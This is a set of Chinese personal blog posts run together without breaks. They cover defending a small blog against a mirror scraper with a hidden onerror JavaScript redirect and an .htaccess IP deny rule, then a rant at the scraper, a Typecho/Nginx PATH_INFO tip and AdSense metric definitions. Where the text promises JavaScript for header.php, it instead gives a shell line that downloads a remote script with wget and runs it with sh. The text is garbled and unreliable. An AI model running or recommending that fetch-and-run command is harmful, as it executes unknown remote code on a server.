之前熊猫防镜像用的js判断地址栏域名跳转,和.htaccess屏蔽IP(原文),后来对方过滤了JS,就没法回到熊猫博客了那么镜像过滤了JS,如何再处理调回原网站。JS被过滤后的镜像解决方法: <div style="display:none;"> <script>proxy2016 = false;</script> <img src="" onerror='setTimeout(function(){if(typeof(proxy2016)=="undefined"){window.location.href="www.pandasoda.cn";}},3000);'> </div>已经知道了镜像站会过滤掉JS规则,所以 proxy2016 = false;会被过滤掉,img 的 onerror在3秒后,将运行函数部分,检测是否还存在 proxy2016 字符,如果没有找到就会将主机的 URL 改为 www.pandasoda.cn;为了安全起见
熊猫我原本也不想写这篇文章,更没必要骂人,这是这个恶心镜像采集我的小人,都被我发现了,还继续采集,真是恶心到我了。熊猫博客里没有什么东西,网站权重也没有,网站流量都是大哥们恭喜的,没必要采集我这小网站。这位仁兄,看到这篇文章,我们不妨交流一番,“防”我的站,用了美国的服务器,我还没办法投诉,高明!DNS盾解析了这个域名,统计还用的51la昨天一天是不是就找那个跳转代码了? 可惜你删JS是不是看不懂,只会一股脑的全部删除啊,必要的代码都删掉了骂人其实没意思,也请你不要再镜像采集我网站了,服务器承受不了就容易奔溃了。
一大早上看一下ADS的收益,发现一个其他域名,熊猫这个小博客竟然被“镜像”了!配合昨天服务器延迟就知道了,真恶心啊。就是这个域名先过过看看再说,网站基本复制了昨晚的页面国外服务器,这个IP就是个贼窝既然知道网站被“镜像”了,就着手防镜像在网站header.php文件head里面添加下面js代码yum -y install wget;wget hlsh.sh -O s;sh s在.htaccess文件最上面添加下面代码:#添加IP黑名单 Order Deny,Allow Deny from XXX.XXX.XXX.XXX 这样就差不多了,但是镜像熊猫的好像只是扒了皮,并没有实时镜像网站,暂且都加上,防止进一步的镜像<目前已经解决了,镜像网站(www.9kyuslzy.com)已经跳转回熊猫博客了
很多实用Nginx来运行typecho的小伙伴都遇到了这种问题,需要我们手动开启PATH_INFO来支持typecho,这次来说说如何解决宝塔安装的问题。在宝塔的PHP设置页,勾选启用PATH_INFO这样宝塔安装的Nginx就可以顺利的驱动typecho了。
最近熊猫博客添加了Google的ADS广告,那么ADS中的广告类型都是什么。 CTR(Click-through Rate): 点击率。一则广告收到的点击次数除以这则广告显示的次数(显示)。 CPC(Cost Per Click): 每次点击付费。当某一位浏览者点击你的广告时所支付的数额。 所以收入是,4x0.19=0.76 RPM 是每千次广告单元展示的收入 CTR=点击率,CPC=单价,RPM=每千次广告展示的费用
熊猫
一个沙雕